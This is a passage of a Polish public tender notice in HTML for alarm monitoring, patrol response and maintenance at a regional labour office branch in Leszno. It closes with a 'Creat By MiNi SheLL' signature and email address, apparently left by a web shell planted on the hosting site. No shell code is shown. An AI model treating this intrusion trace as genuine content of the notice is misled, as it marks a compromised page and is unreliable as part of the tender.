d)	centrum musi zapewnić możliwość rejestracji, archiwizacji i odtworzenia wszystkich monitorowanych zdarzeń zaistniałych w systemie z okresu ostatnich 3 miesięcy.
2)	całodobowy nadzór i utrzymanie w stałej sprawności technicznej stacji bazowej, której zadaniem jest odbiór sygnałów alarmowych z systemu lokalnego Zamawiającego do stacji monitorującej zainstalowanej w siedzibie Wykonawcy i będącej w dyspozycji Wykonawcy. 
3)	zapewnienie gotowości do interwencji załóg patrolowych, składającej się z co najmniej 
2 pracowników ochrony, posiadających licencję I stopnia i wyposażonych w środki przymusu bezpośredniego w tym: kajdanki, pałka, gaz obezwładniający oraz posiadających niezależną łączność umożliwiającą bezpośredni kontakt z centrum monitorowania i samochód interwencyjny o zwiększonej mocy.
4)	spowodowanie niezwłocznej interwencji i przyjazdu grupy interwencyjnej w czasie nieprzekraczającym 10 minut od odebrania sygnału o alarmie (napad, włamanie, pożar) i podjęcia czynności ochronnych. Po dokonaniu stosownych sprawdzeń, podjęcie działań, takich jak: powiadomienie Policji, Straży Pożarnej, Pogotowia Ratunkowego, osób wskazanych przez Zamawiającego oraz zabezpieczenia chronionego obiektu do czasu przybycia osób wskazanych przez Zamawiającego, Policji, Straży Pożarnej, Pogotowia Ratunkowego,
5)	wezwanie osób wskazanych przez Zamawiającego w okolicznościach wskazujących na zaistnienie przestępstwa, bądź w sytuacji uzasadniającej podejrzenie jego popełnienia, takiej jak brak uszkodzeń, lecz: otwarte drzwi czy okna, zauważone przez grupę ruchy wewnątrz zamkniętego obiektu, dochodzące stamtąd odgłosy, światło mogące oznaczać pożar itp., 
6)	zgłaszanie Zamawiającemu każdego przypadku uszkodzenia, bądź jakiejkolwiek innej niesprawności łącza telefonicznego, wykrytego przez stację monitorującą, mających wpływ na monitorowaniu systemu alarmowego, 
7)	utrzymanie systemu alarmowego (włamania, ppoż., zalania) w chronionym obiekcie przez czas trwania umowy w stanie sprawnym technicznie, w tym dokonywania odpowiednich czynności konserwacyjnych i okresowych przeglądów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wojewódzki Urząd Pracy w Poznaniu Oddział Zamiejscowy w Lesznie przy ul. Śniadeckich 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usługi monitorowania systemów alarmowych:
-	całodobowe monitorowanie systemu włamania, ppoż.
-	instalacja przewodowa, obejmuje jedną kondygnację tj. I piętro, budynku - pomieszczenia biurowe i korytarz.
Osobą do kontaktu jest Pan Zdzisław Giera nr telefonu - (65) 529-57-66.
2. Zobowiązania Wykonawcy:
1)	posiadanie centrum monitorowania z całodobową obsługą posiadającą licencję pracownika zabezpieczenia technicznego I stopnia, odpowiednio zabezpieczone przed dostępem osób postronnych oraz próbami celowego uszkodzenia, zniszczenia lub zakłócenia jego pracy. Oddalone centrum monitorowania musi ponadto spełniać następujące wymogi:
a)	posiadać optyczno - akustyczną sygnalizację stanów alarmowych oraz sygnalizację wykrycia uszkodzenia torów i urządzeń transmisji sygnału alarmowego,
b)	zasilanie ze źródła rezerwowego powinno pozwalać na niezakłóconą pracę centrum w czasie nie krótszym niż 36 godzin,
c)	  całodobowa obsługa serwisowa centrum powinna przywrócić zdolność monitorowania systemu alarmowego chronionego obiektu w czasie nie dłuższym niż 30 minut,
d)	centrum musi zapewnić możliwość rejestracji, archiwizacji i odtworzenia wszystkich monitorowanych zdarzeń zaistniałych w systemie z okresu ostatnich 3 miesięcy.
2)	całodobowy nadzór i utrzymanie w stałej sprawności technicznej stacji bazowej, której zadaniem jest odbiór sygnałów alarmowych z systemu lokalnego Zamawiającego do stacji monitorującej zainstalowanej w siedzibie Wykonawcy i będącej w dyspozycji Wykonawcy. 
3)	zapewnienie gotowości do interwencji załóg patrolowych, składającej się z co najmniej 
2 pracowników ochrony, posiadających licencję I stopnia i wyposażonych w środki przymusu bezpośredniego w tym: kajdanki, pałka, gaz obezwładniający oraz posiadających niezależną łączność umożliwiającą bezpośredni kontakt z centrum monitorowania i samochód interwencyjny o zwiększonej mocy.
4)	spowodowanie niezwłocznej interwencji i przyjazdu grupy interwencyjnej w czasie nieprzekraczającym 10 minut od odebrania sygnału o alarmie (napad, włamanie, pożar) i podjęcia czynności ochronnych. Po dokonaniu stosownych sprawdzeń, podjęcie działań, takich jak: powiadomienie Policji, Straży Pożarnej, Pogotowia Ratunkowego, osób wskazanych przez Zamawiającego oraz zabezpieczenia chronionego obiektu do czasu przybycia osób wskazanych przez Zamawiającego, Policji, Straży Pożarnej, Pogotowia Ratunkowego,
5)	wezwanie osób wskazanych przez Zamawiającego w okolicznościach wskazujących na zaistnienie przestępstwa, bądź w sytuacji uzasadniającej podejrzenie jego popełnienia, takiej jak brak uszkodzeń, lecz: otwarte drzwi czy okna, zauważone przez grupę ruchy wewnątrz zamkniętego obiektu, dochodzące stamtąd odgłosy, światło mogące oznaczać pożar itp., 
6)	zgłaszanie Zamawiającemu każdego przypadku uszkodzenia, bądź jakiejkolwiek innej niesprawności łącza telefonicznego, wykrytego przez stację monitorującą, mających wpływ na monitorowaniu systemu alarmowego, 
7)	utrzymanie systemu alarmowego (włamania, ppoż., zalania) w chronionym obiekcie przez czas trwania umowy w stanie sprawnym technicznie, w tym dokonywania odpowiednich czynności konserwacyjnych i okresowych przeglądów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com